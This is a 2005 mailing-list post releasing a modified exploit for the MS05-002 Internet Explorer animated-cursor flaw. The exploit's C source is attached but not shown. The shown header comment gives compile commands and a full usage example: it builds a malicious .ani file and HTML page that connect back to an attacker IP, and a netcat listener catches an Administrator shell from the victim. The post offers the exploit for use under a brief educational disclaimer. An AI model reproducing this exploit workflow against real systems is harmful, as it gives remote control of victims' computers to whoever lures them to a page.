Vulnerability Development mailing list archives
Fwd: MS05-002 xploit modification - connectback addition
From: Benn Goldman Rivers <benoror () gmail com>
Date: Sun, 30 Jan 2005 04:59:13 -0600
Filename with greetings ... sorry On Sun, 30 Jan 2005 00:41:16 -0600, <benoror () gmail com> wrote:
/* WC-ms05002-ani-expl-cb.c: 2005-01-30: PUBLIC v.0.2 * * Copyright (c) 2004-2005 WhiskyCoders. * * (MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit * (CAN-2004-1049) * * WhiskyCoders - http://bennupg.ath.cx * Greetz: nitrous, kubaner, cryogen, rowter, dex, beck, and everyone else in the vulnfact.com crew * * (universal -- for all affected systems) * --------------------------------------------------------------------- * Notes: * This is a mod of houseofdabus (HOD-ms05002-ani-expl.c) exploit. * http://www.k-otik.com/exploits/20050123.HOD-ms05002-ani-expl.c.php * --------------------------------------------------------------------- * Description: * A remote code execution vulnerability exists in the way that * cursor, animated cursor, and icon formats are handled. An attacker * could try to exploit the vulnerability by constructing a malicious * cursor or icon file that could potentially allow remote code * execution if a user visited a malicious Web site or viewed a * malicious e-mail message. An attacker who successfully exploited * this vulnerability could take complete control of an affected * system. * * --------------------------------------------------------------------- * Patch: * http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx * * --------------------------------------------------------------------- * Tested on: * - Windows Server 2003 * - Windows XP SP1 * - Windows XP SP0 * - Windows 2000 SP4 * - Windows 2000 SP3 * - Windows 2000 SP2 * * --------------------------------------------------------------------- * Compile: * * Win32/VC++ : cl -o WC-ms05002-ani-expl-cb WC-ms05002-ani-expl-cb.c * Win32/cygwin: gcc -o WC-ms05002-ani-expl-cb WC-ms05002-ani-expl-cb.c * Linux : gcc -o WC-ms05002-ani-expl-cb WC-ms05002-ani-expl-cb.c * * --------------------------------------------------------------------- * Example: * **ATTACKER: * * d00d@whiskybox $ WC-ms05002-ani-expl-cb poc 7778 192.168.0.30 * <...> * [*] Creating poc.ani file ... Ok * [*] Creating poc.html file ... Ok * * d00d@whiskybox $ netcat -l -p 7778 -v * **VICTIM: * * C:\> iexplore C:\poc.html * **ATTACKER: * d00d@whiskybox $ netcat -l -p 7778 -v * Microsoft Windows 2000 [Version 5.00.2195] * (C) Copyright 1985-2000 Microsoft Corp. * * C:\Documents and Settings\Administrator\Desktop> * * --------------------------------------------------------------------- * * This is provided as proof-of-concept code only for educational * purposes and testing by authorized individuals with permission to * do so. * */
Attachment:
WC-ms05002-ani-expl-cb.c
Description:
Current thread:
- Fwd: MS05-002 xploit modification - connectback addition Benn Goldman Rivers (Jan 31)